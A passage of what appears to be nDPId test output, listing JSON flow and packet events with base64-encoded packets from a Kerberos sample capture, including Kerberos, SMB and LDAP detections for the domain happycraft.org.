ejggPsMIID6KADAgESoQMCAQKiggPaBIID1hKWdXqL0IxSnZlxRjhHmIFUVS3rvb7i9fEBKrEJ5PVjDXxsAQeDmTL9wweNNg1pCQDRmZ6AE\/m2Y7TGJV\/FdJF\/GLAs\/UE5nC+H+eLE4iuLtnFkH3govXIWXOdlEsqQhROyd4qj2WtH7bxyzZwdtdBzD8HNk\/Zyhfmgmp+oA1+8nXeYYFDFKmqTt9a00HvvmTpJfi0pguIgxY8KmJbF4d1RUkWNuXZ5g7FA43R8i0OyHjh+mwSGoE1gJ\/X8DroluAfskaOHhGVguFx+famY4o8UsY6g4BojHiLERbIlzMsUYRq\/EQf2FuSw8Wc3swODADnnHqoAdpFJG5\/GMQbUUUhsHy5eDXa3\/EPT1ZKqI0bJsr7jOF5G9ytS8thT6E7bOOCcOFN4JNFsCA3bCyRL6jYH2ZedtZMr5yCI40ePAHAaIBbEPTKYDMpCUKxXExG41vrN6dY4CEFLw2Tb4BDinhxjESAIpIw6LOtdRzBrkjiFKjPEj4UBorlhX90DmWgF5dFJbZXz5eOVcZ\/qmOnm8JcuVim8byzO3C2W5go47U+8GNRvk\/iuaoCs18MAuzn4DOtJmgk1eSuxxL9sUZmjkqejNSB6Ny8aYGysoT\/tUR2mS\/10DyxEUb\/M23KvW\/d0nkBg7qCjWXvlLjMDmACl3rd8MXcyqYWqmZcwKWLk5yL3YiZbL90SxemnQHTIY+DWavybHj9SrM5+aINDzqHcDq0aHAhhwNPUOQQH+m0ab759iCYVNaTyITpTWuG6hneFvKoU9d3uSafxpBU5TJfC9PTmhW+\/db+6ouEM0JlNTrwSmfDpaJJPc+gkzn45Pl5k\/7+Abb+s6rWMNfHT+Em3MBbZJYdM0UlQ1xrel8YuJnwOOGyF4x2puehNGP\/\/\/ouwl65KT\/CBdxNVmhdbElBMgwiINySCK0GaA0G8iJuo2p3q21Z3q6PwC\/TBFuSNBvRRaLYdHeXUMMCTZUjjLBHDUqLGGPYiG40kPfZcBzP2U1v\/9gWBK4kWlSfWhwHwDob09dR24nAmYkaTEvrRnFvLOPKhepgPz5FiL+TNVO0x7Q9MEcpXED6nxJ9fgUpL+5AL+5zKjvBqGhTBSFztV5n2jwS9BN5nwKGyQXNwz7M3IugClC01JUeDu8ccEtCesL+sdsbL1EP7jcFCC1EniPRKxntY82esVy8lyQlrXBxmBdMcKVUa21imq65LZV0MJEQvFPcKWd3cpqWETjO2y3rGD5HXk8dwPDck3LvUU56PaEiLP3SNlqGRnDfEXoiRxz6YMXMhdwJMRbqAQJYa71fsqMLgQ4u3s5WkgZwwgZmgAwIBEqKBkQSBjoWrS7jR3\/ZxrmkklAr5M\/UVPgZBz\/I0MBRDSrLAPTWRtuq1ZhbBTvDmh4JfIoeW\/NN+j\/BIs99fVl1IARv5kJzlvsrT0oz2PdU+R8Rl10wOzwJfT7yBOJecNjJCW1XhiL9p6LojffFaim+4jvn\/X89SbhRBqPbpCCF+yHmow+h4iZkD+HM6Jz3YsaIdiuQwDqEEAgIApaIGBAQfAAAApGQwYqAHAwUAYIEAEKIQGw5IQVBQWUNSQUZULk9SR6MjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE44s3moBTADAgES"} -00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} -02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1498,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1498,"pkt_l4_len":1464,"thread_ts_msec":1549337931220,"pkt":"AAgCHEeupB9ywglqCABFAAXME4FAAIAGeLmsEAgIrBAIyQBYwBgu4uDhNU2NClAYAQBUPQAAAAAFoG2CBZwwggWYoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIENGGCBDAwggQsoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHo4ID7DCCA+igAwIBEqEDAgECooID2gSCA9aIPBwtNxkshczHziSeGRCcSiSC82vdTNNxZoZEqctTILmi\/cPiWo2kj2ZowTM5BfoTzgngU5zy1dblxSYtNNDo790fqKeln68pSwduOA5ekfZ2omIpLyTKi1Uzi5unXScqqLz0hKSsn\/40+2FcuWZE3ZvPuCmZ8SKPEnuc921KBrNqOj\/0DryAdSyI8er0AkE463j84WxyAtyNQDKDrp2ez6929oR6Rx5hbvL8GdKQY9jCLD2rnICMW89Hj9rOupV1OeH78XxxB7MSKm499oGFFneF9SM8YJwXSSMV673PLXubFj6DMrikD2G0Sl6xic8MhWvEbY+QDRNnfGPZAJvMaahqCk8wVuJCt+fkFop+b4toNRK\/McSX15qS4Oue1FamxPlWb8yeZyA7zxXMdyv\/9YdFl51KW6DMdV\/gNQhWVbNsnpHVbk+dZ3hmZuA13vS+pCaVgYWcY8TsTrrqDHUdvkhYH5y6bQXhaba0hTe8Bpqjtkm6\/RTu4J\/\/NKiUQMb9AOVNXKtDTvIFCVxCzbgDhWofcnihAdfiq3GVUSfoJVIjvbiKN6rurAhxZ5G7eeGZ0k0F7hodA7NNCDg1db\/i3Z0nn0sEe0z7aNhzE0ribx16c5Vcg7SzYKcbmYr2SOlrqyDG2wBIue4c+yHf8w4ERFzFfLLBAoUF6TY9mRoNRbKB\/qSAwbDd52vGpnn87rIVg\/QNGVIwMeb1KKPfdaC4wum+6\/FhZgWd0DbrZEhIXl\/8HN6zG+3ywmGFdeC2DFCmO4dETOrfkL6fl3T\/7ku0etROu1j+k26SXEG6Gge01yPUKju51MrjdtHnDZ1Ss42MB0XlUT6U6S5TlEIP\/8k9d0krm1cn0oRERln+NBIaJS\/B2711LZddv4tje7ItSqfXLacjoI7g80JWdXjf4l7SPcZiNeEbp1dMmXrQFZcbRN17kosEr4Tm2W4friYde8+zbAKqoXvVJXbnxAUwEVAGcV\/iPptIl\/xW9mtB0WPhDmkKXm2SfL9rih8OBbowoKkOmIJqQw8CRJRncVK0szyJok+ajlBHDiJgpcZUT8EmfmEr0qJ0qoMeuCqxs8Kf3IstAtgMR7lMBZda98WMq0J06Prxf9X\/7Sw5XHFF0Ihx2VyWiVN3DmzgADoDdivNlyaD8+Octjfvk+ZwiZGCsRMD1d7AL6HjQzrju4nysDHJIjeaKR52nWtCWAZ87qog1mDH+qjQPdMGkDr1FGrVbBXAZcR0K17tOKTw9bgQg9LvLMWeDMDNCEwvA8GHdr\/fAsBPK3PDKVyht8oNdhjar8xKOZRvwzCOpoIBJjCCASKgAwIBEqKCARkEggEVYp6jTcDi\/gYVd9SDuEsi2VccBape1lXgcuGoeWG1ePxV5NidfJvDEi3F2VmdD04JFUaFb\/GRqNe9F8xWyy86xiJ3eKyJgAfyG7DDQnnFCeKC++4ORaBUkKnIeWwsFqQxh0aL1BrdknGP8u06G6P95r9esj7jUPDXQ1D0+jbs1WpWssKqZMQfUgV0eg9FoEGdVPsUmgNbZN2YPPrxhZ6CEgNOIC\/5aj8NqGMkPPX6xfYF4tbD74dZ3EfC4ry5KcIxNVYXU179as2C\/cihpEMrX8yiZtM91awDzQYUMPKt3\/3WSS96ycQo00pex7Pc1Jh3j49Cr5ckyWXD9SUXbCcOpUpip4\/Jz5Hvsliozjm5inKwUIBTJQ=="} -00735{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931220,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1549337931220,"pkt":"pB9ywglqAAgCHEeuCABFAAELAJhAAIAGkGOsEAjJrBAICMAWAb2ZMOb++YgxIFAYAP+McAAAQFskZ7b1ZYO5\/CuVOTe3ZqHs3nhqe1KXhnlBtJ\/qDgyo+sduQpC\/WLkmAdUvTJdV+CtGiwLoGf3Uio50ZE6gilnFEbzLLhzMIw4gwhRvlYwapNctw4G2EkpKfWO1MgMQ0yTGVxtfwAuP0ouYkDi\/6FI97AzDGvp\/R2LK19PAI403fVWk1Cbb2O\/YPOGH5a8hHowuR6tT8UugHDdGGl\/fWl8Wk4rCdi\/3gOYAhRVI6o2ZOHpv4GeBlLgJ6L2WL35O3jhh2e2dr0Fkd\/WG3ET2QLw9x3WRfncFn29f8nOqAUQDRH0="} -00809{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1549337931221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337931221,"pkt":"AAgCHEeupB9ywglqCABFAAEsE4VAAIAGfVWsEAgIrBAIyQG9wBb5iDEgmTDn4VAYAP9zWgAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAEAAAAAAAAA\/\/4AAAAAAABdAAAAAAQAAPvWvNgjH\/I48OPxOa5H7a4JAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbUswX\/mwh6g2ztwHi8\/dTRtvFzo0LVENq7tttT0JwVpKoIxijjsysss5HuCbI3DQGU7C0ILmrl+8phtVtu+2vBMSA9FKWe75R\/a+ST6oEaoDrDjzWfPqdU4xUCgD\/zK6J0O4Dsk+rO8nhy4LUmk="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937690,"flow_last_seen":1549337937690,"flow_idle_time":7440000,"flow_min_l4_payload_len":266,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1549337937690,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1549337937690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1549337937690,"pkt":"pB9ywglqAAgCHEeuCABFAAEyAM1AAIAGkAesEAjJrBAICMAbAYXq\/lHZFzDO61AYAQB3VwAADK3yhyWG\/w4ePjAcLdmQD9l5KJpA6NxzQuCtaFM+te5CWXRB5sUkdKJyUVp4kqyFJvIav1zvlLEwv\/M6QDvIyPip6cO\/Y7DDZ55OmD6IlKO8Nx5lANmfdaxcK4l74ZAlM45v2cQu8OV3yuWKq5L2jtnHunCltg9I9Mqjq93VmxUc7poK8vfSfY1YgBhAmlp0cXMsoyIbcEQodelj3wLBZ2oxItwV78GGNt7TlfW6joQ5wfkj6ZEyRFJn0CVihbNqYYKxBD44uauIJQKkPsQlzXsxooh9lhiWoZtuh5F2\/1LO7drek9zYg6pqUFpyhpL3WcFxh3R7Uuv9RQ5CYfOoVItdeOxn2w53bU0="} -00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1549337937691,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337937691,"pkt":"AAgCHEeupB9ywglqCABFAAD6E5tAAIAGfXGsEAgIrBAIyQGFwBsXMM7r6v5S41AYAQDOWAAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1JH5VWFTlwrbTZZZgbjZtW4QY+VaIr2rFT9\/AbDkv31Idx3xo24Bwzqv50t5zQXx7Id1H\/iLYt+nRqN0NWzCDJwnAfwcbOTGF30f3qnaqB+vDQ9EhQX38cpSy926C3lIc0Vkhc+VaaHdh510+B"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937700,"flow_last_seen":1549337937700,"flow_idle_time":7440000,"flow_min_l4_payload_len":266,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1549337937700,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1549337937700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1549337937700,"pkt":"pB9ywglqAAgCHEeuCABFAAEyANVAAIAGj\/+sEAjJrBAICMAcAYWCU2zwSN6TcFAYAQDS2QAAEgduSF05n8MFVjy4LWbkIsui7POF\/jI0fgAi3\/kn4+lZJrv4uo1Xj0IHKshBaLfyrICuzZtbBAFYjLvQz7y8gyRTfkwzadmnUFntTq1Eam1s4n2Qhfn1fuSUa5DAR1i941DEujmYu8fTZX3tp1hllqkxXisHcqSEIi8W9weLGXgpYEZYoErMkYejHKEeDmPCwQO6JC7sDmP8cAErQb7Rc88wLF4lFI7xOIE4FiH\/05afA1w9V5d1P2yDaGB6bADs\/c2xi7QKQuP+FixF4gof0ovK0nwq\/y7Hd27V4SQ4qHRNlXJex92QoEPhio00QFq1bLTnuvdcqFYcMu\/6\/tRVEcFKp0ezr7WF5MI="} -00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1549337937701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337937701,"pkt":"AAgCHEeupB9ywglqCABFAAD6E6JAAIAGfWqsEAgIrBAIyQGFwBxI3pNwglNt+lAYAQCvQgAAMIQAAADMAgEKYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG2EupGhqTVA+Kxm5vIdkbfFjlPoe8DmjpF\/p2I3j7EwFjqQzavz5jy+cGzZKn09a9y0dyj\/mpeHcqpjjORB3KYfxKGHrDmiKKSYiCwqx86ee7rLKiQPX2z3RSwNa4fWz8uAjgw+I5CkXYbP6rNu"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00776{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337937703,"pkt":"pB9ywglqAAgCHEeuCABFAAEXANlAAIAGkBasEAjJrBAICMAdAFjHhcaiuhdcXlAYAQCv5QAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkohAbDkhBUFBZQ1JBRlQuT1JHoyMwIaADAgECoRowGBsGa3JidGd0Gw5IQVBQWUNSQUZULk9SR6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBFIcW1KoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="} -00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} -00826{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337937703,"pkt":"AAgCHEeupB9ywglqCABFAAE+E6VAAIAGfSOsEAgIrBAIyQBYwB26F1xex4XHkVAYAQDp0AAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg1NlqlBQIDBJWNpgMCARmpEBsOSEFQUFlDUkFGVC5PUkeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="} -00731{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":45,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337937724,"pkt":"pB9ywglqAAgCHEeuCABFAAFnAN1AAIAGj8KsEAjJrBAICMAeAFgo\/29go\/Vk0VAYAQAVQgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4EwWkoanvLUiVA5eu8uG72\/EPy4+eHAiK9HbftleuqZ7DwBR\/wY3Sc5USTXPr6SJXdlLH8zfIE5MwEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLSk9ITlNPTi1QQySiEBsOSEFQUFlDUkFGVC5PUkejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIEUhxbUqgVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} -00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} -00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337937724,"pkt":"AAgCHEeupB9ywglqCABFAACYE6pAAIAGfcSsEAgIrBAIyQBYwB6j9WqFKP9wn1AYAQCbeQAAeBxjGZR555TmhlGtfWdB3hqYo6lYswe6vKpNUcrN1M7KGcxMIdPLYhZ04dECjGI6ypolTWuvt884Bi2lq0pIFbZFVKD3x\/BnUesSWAB9L0qg+5NPzwAEggckaZSGKHdd5sXD0ux4MNvoyw986qY1Nw=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937725,"flow_last_seen":1549337937725,"flow_idle_time":7440000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":1,"thread_ts_msec":1549337937725,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1549337937725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1549337937725,"pkt":"pB9ywglqAAgCHEeuCABFAAB4AONAAIAGkKusEAjJrBAICMAfAFi1TK\/3YmHJT1AYAQDj2wAAbj2wbk+derrxO0c0pxRSdruhR6\/j4Ui\/xNsBa8OfbfRkbAwdywbQynHUORFcFH8maukxsoLa+OhvD2a5+zDPKPlneJ\/sg2b\/GuIvr5ZD3Bg="} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1549337937726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1549337937726,"pkt":"AAgCHEeupB9ywglqCABFAABQE7BAAIAGfgasEAgIrBAIyQBYwB9iYc8DtUywR1AYAQDGTwAA4zLECSz5GZPNqNSL4T5BMx8WrZoQ8TiJymulR2VkZN3O1rD+5YXABg=="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337940431,"flow_last_seen":1549337940431,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1549337940431,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1549337940431,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1549337940431,"pkt":"pB9ywglqAAgCHEeuCABFAACxAPpAAIAGkFusEAjJrBAICMAiAFjJGNiQqlyd6VAYAQDPPQAAiJisSNul39yNkXIaZ7I9abKKHsFn\/6nUnlpuYlwP2aMvOAIHPA5TwBaAhiWq+tFyYupNZpDDILw6OTtdBUx9AScUIqcHtp8iuHt0kMVzTn\/4u2MWOJ3B5oBzCaRbB4JGSnxRjDJCJirb6nGFgBI0LOLujBAlXiGb5mYfdXtWDkYlEBJfjMNCAaw="} 